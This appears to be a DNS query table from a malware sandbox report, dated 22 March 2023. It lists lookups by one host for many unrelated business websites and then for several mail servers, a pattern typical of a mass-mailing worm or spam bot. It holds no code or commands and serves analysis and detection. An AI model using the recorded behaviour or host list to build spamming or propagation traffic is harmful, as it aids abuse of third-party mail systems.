                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.612871885 CET192.168.2.58.8.8.80x28b5Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.628295898 CET192.168.2.58.8.8.80xb1fcStandard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.708681107 CET192.168.2.58.8.8.80x7f7bStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:40.740278006 CET192.168.2.58.8.8.80x6714Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.125447989 CET192.168.2.58.8.8.80x6a87Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.126144886 CET192.168.2.58.8.8.80x3cb3Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.132756948 CET192.168.2.58.8.8.80xc723Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.289196968 CET192.168.2.58.8.8.80xeaa5Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.291577101 CET192.168.2.58.8.8.80x86caStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.334724903 CET192.168.2.58.8.8.80x3045Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.460603952 CET192.168.2.58.8.8.80x6b0cStandard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.968312979 CET192.168.2.58.8.8.80x45e1Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.968792915 CET192.168.2.58.8.8.80x250fStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.968792915 CET192.168.2.58.8.8.80x38afStandard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:41.988673925 CET192.168.2.58.8.8.80xa34fStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.086252928 CET192.168.2.58.8.8.80xd819Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.135560989 CET192.168.2.58.8.8.80x6a87Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.277620077 CET192.168.2.58.8.8.80x8479Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.447530985 CET192.168.2.58.8.8.80x5daStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.536519051 CET192.168.2.58.8.8.80x64d9Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.657819986 CET192.168.2.58.8.8.80x5ad5Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:42.672616959 CET192.168.2.58.8.8.80xbc2aStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.016704082 CET192.168.2.58.8.8.80x250fStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.305440903 CET192.168.2.58.8.8.80x45e5Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.400279045 CET192.168.2.58.8.8.80x523Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.400788069 CET192.168.2.58.8.8.80x2eb3Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.418390036 CET192.168.2.58.8.8.80xf2a0Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.424217939 CET192.168.2.58.8.8.80x428eStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.505754948 CET192.168.2.58.8.8.80x47fdStandard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.772969961 CET192.168.2.58.8.8.80xb230Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.774626017 CET192.168.2.58.8.8.80xcff2Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.807866096 CET192.168.2.58.8.8.80x55dcStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:43.913492918 CET192.168.2.58.8.8.80x4b93Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.057365894 CET192.168.2.58.8.8.80x250fStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.084264994 CET192.168.2.58.8.8.80x2c06Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:44.539597034 CET192.168.2.58.8.8.80xcc04Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:45.153661966 CET192.168.2.58.8.8.80xe298Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:45.445115089 CET192.168.2.58.8.8.80xb669Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.292265892 CET192.168.2.58.8.8.80x1033Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.432643890 CET192.168.2.58.8.8.80x77e2Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.680291891 CET192.168.2.58.8.8.80xaa84Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:46.780472040 CET192.168.2.58.8.8.80x428aStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.057521105 CET192.168.2.58.8.8.80x8dd3Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.241014004 CET192.168.2.58.8.8.80x96c2Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.561819077 CET192.168.2.58.8.8.80xa5c6Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:47.723401070 CET192.168.2.58.8.8.80xfde6Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.151377916 CET192.168.2.58.8.8.80xd080Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.152555943 CET192.168.2.58.8.8.80x8320Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.187304020 CET192.168.2.58.8.8.80xfc4cStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.392839909 CET192.168.2.58.8.8.80xfb9aStandard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:48.564512014 CET192.168.2.58.8.8.80xdffcStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.073574066 CET192.168.2.58.8.8.80x5c69Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.171766043 CET192.168.2.58.8.8.80x7c46Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.477540970 CET192.168.2.58.8.8.80xd30cStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:49.737417936 CET192.168.2.58.8.8.80xeeacStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.102129936 CET192.168.2.58.8.8.80xb57dStandard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.207195997 CET192.168.2.58.8.8.80x98bcStandard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:50.601303101 CET192.168.2.58.8.8.80x64e2Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:51.227694988 CET192.168.2.58.8.8.80xe534Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:52.066816092 CET192.168.2.58.8.8.80x1391Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:52.229743958 CET192.168.2.58.8.8.80xe534Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:52.859970093 CET192.168.2.58.8.8.80x26d5Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.277601004 CET192.168.2.58.8.8.80xe534Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:53.559854031 CET192.168.2.58.8.8.80x5bc1Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:54.601344109 CET192.168.2.58.8.8.80xb031Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:54.611798048 CET192.168.2.58.8.8.80xe78fStandard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:55.381057024 CET192.168.2.58.8.8.80xe84cStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:57.950213909 CET192.168.2.58.8.8.80xf716Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:57.954154015 CET192.168.2.58.8.8.80x20fcStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:57.956465960 CET192.168.2.58.8.8.80xf02Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:58.440696955 CET192.168.2.58.8.8.80xa513Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:58.450726986 CET192.168.2.58.8.8.80xc3a5Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.051018953 CET192.168.2.58.8.8.80x1590Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.054950953 CET192.168.2.58.8.8.80x9778Standard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.282887936 CET192.168.2.58.8.8.80x5036Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:43:59.478379011 CET192.168.2.58.8.8.80x1e11Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.040775061 CET192.168.2.58.8.8.80xe333Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.356268883 CET192.168.2.58.8.8.80xd644Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.372483969 CET192.168.2.58.8.8.80xdc69Standard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:00.985886097 CET192.168.2.58.8.8.80x15Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.267961979 CET192.168.2.58.8.8.80x6c8bStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.316364050 CET192.168.2.58.8.8.80xd23aStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.333331108 CET192.168.2.58.8.8.80xed64Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.947630882 CET192.168.2.58.8.8.80x1296Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:01.988301039 CET192.168.2.58.8.8.80x562Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.126595020 CET192.168.2.58.8.8.80xb8d6Standard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.317646027 CET192.168.2.58.8.8.80xa326Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.786798954 CET192.168.2.58.8.8.80xe62cStandard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:02.831291914 CET192.168.2.58.8.8.80x9c57Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.030756950 CET192.168.2.58.8.8.80x8180Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.397247076 CET192.168.2.58.8.8.80x28Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:03.751813889 CET192.168.2.58.8.8.80x448eStandard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.096393108 CET192.168.2.58.8.8.80x9f6bStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.105007887 CET192.168.2.58.8.8.80x7de2Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.324877977 CET192.168.2.58.8.8.80x9189Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:04.864706039 CET192.168.2.58.8.8.80x9029Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.268438101 CET192.168.2.58.8.8.80x5f07Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.456338882 CET192.168.2.58.8.8.80x9660Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.518836021 CET192.168.2.58.8.8.80x7c74Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:05.697279930 CET192.168.2.58.8.8.80xff94Standard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:06.315227985 CET192.168.2.58.8.8.80xd92eStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:06.899017096 CET192.168.2.58.8.8.80x91c5Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:08.142960072 CET192.168.2.58.8.8.80x1f75Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.026040077 CET192.168.2.58.8.8.80xff3dStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.314338923 CET192.168.2.58.8.8.80x8198Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.338378906 CET192.168.2.58.8.8.80xea3aStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:09.338578939 CET192.168.2.58.8.8.80xd9b7Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.038831949 CET192.168.2.58.8.8.80xfad1Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.253218889 CET192.168.2.58.8.8.80xbcf9Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.738302946 CET192.168.2.58.8.8.80xe705Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:10.929976940 CET192.168.2.58.8.8.80x1ed1Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:11.406109095 CET192.168.2.58.8.8.80x8fc8Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:12.026289940 CET192.168.2.58.8.8.80x7930Standard query (0)www.pohlfood.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:13.322987080 CET192.168.2.58.8.8.80xd6a8Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:13.648462057 CET192.168.2.58.8.8.80x415bStandard query (0)www.11tochi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:16.259767056 CET192.168.2.58.8.8.80x1ee2Standard query (0)www.pb-games.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:16.766539097 CET192.168.2.58.8.8.80x45f2Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:17.351532936 CET192.168.2.58.8.8.80xad03Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:18.484534979 CET192.168.2.58.8.8.80x5c33Standard query (0)smtp.sbcglobal.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.317635059 CET192.168.2.58.8.8.80x4e2bStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.322940111 CET192.168.2.58.8.8.80x75d6Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:19.324002028 CET192.168.2.58.8.8.80xce10Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:20.802573919 CET192.168.2.58.8.8.80x52aaStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.583453894 CET192.168.2.58.8.8.80xf62dStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.740242004 CET192.168.2.58.8.8.80xa268Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:21.861201048 CET192.168.2.58.8.8.80x9e65Standard query (0)mail.protonmail.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:22.474478960 CET192.168.2.58.8.8.80x9b9eStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.228606939 CET192.168.2.58.8.8.80xef1Standard query (0)www.fnsds.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.562474012 CET192.168.2.58.8.8.80xf5eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.654156923 CET192.168.2.58.8.8.80xf942Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.670448065 CET192.168.2.58.8.8.80x9940Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.679327011 CET192.168.2.58.8.8.80x31a8Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.684096098 CET192.168.2.58.8.8.80xe1daStandard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.690551996 CET192.168.2.58.8.8.80x8f96Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.696434975 CET192.168.2.58.8.8.80x9f95Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:24.710773945 CET192.168.2.58.8.8.80x338bStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.100509882 CET192.168.2.58.8.8.80xe80Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.115535021 CET192.168.2.58.8.8.80x3820Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.118273020 CET192.168.2.58.8.8.80x567aStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.120727062 CET192.168.2.58.8.8.80xd043Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.121457100 CET192.168.2.58.8.8.80x5d41Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.127746105 CET192.168.2.58.8.8.80x23e9Standard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.128643990 CET192.168.2.58.8.8.80x461dStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.162451982 CET192.168.2.58.8.8.80xe6e5Standard query (0)mxs.mail.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.167146921 CET192.168.2.58.8.8.80x79ddStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.167651892 CET192.168.2.58.8.8.80xcba3Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.193150997 CET192.168.2.58.8.8.80xc63bStandard query (0)alt4.gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.204497099 CET192.168.2.58.8.8.80x7d02Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.229345083 CET192.168.2.58.8.8.80xee96Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.253904104 CET192.168.2.58.8.8.80x34fStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.256012917 CET192.168.2.58.8.8.80x6aeaStandard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.308016062 CET192.168.2.58.8.8.80xe002Standard query (0)in1.smtp.messagingengine.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.428971052 CET192.168.2.58.8.8.80x8788Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.432364941 CET192.168.2.58.8.8.80xe18eStandard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.432498932 CET192.168.2.58.8.8.80x6775Standard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.432498932 CET192.168.2.58.8.8.80xbb4bStandard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.432754040 CET192.168.2.58.8.8.80x90caStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.443907022 CET192.168.2.58.8.8.80x52f6Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.464662075 CET192.168.2.58.8.8.80x2e72Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.503911018 CET192.168.2.58.8.8.80x4cd5Standard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.571579933 CET192.168.2.58.8.8.80xf89aStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.571579933 CET192.168.2.58.8.8.80x67a1Standard query (0)www.muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.660609007 CET192.168.2.58.8.8.80x24a9Standard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.695986986 CET192.168.2.58.8.8.80x54fbStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.758632898 CET192.168.2.58.8.8.80xf5eStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.778017044 CET192.168.2.58.8.8.80x31e4Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.794038057 CET192.168.2.58.8.8.80x30aaStandard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:25.849045992 CET192.168.2.58.8.8.80x5ec0Standard query (0)samtv.roA (IP address)IN (0x0001)false
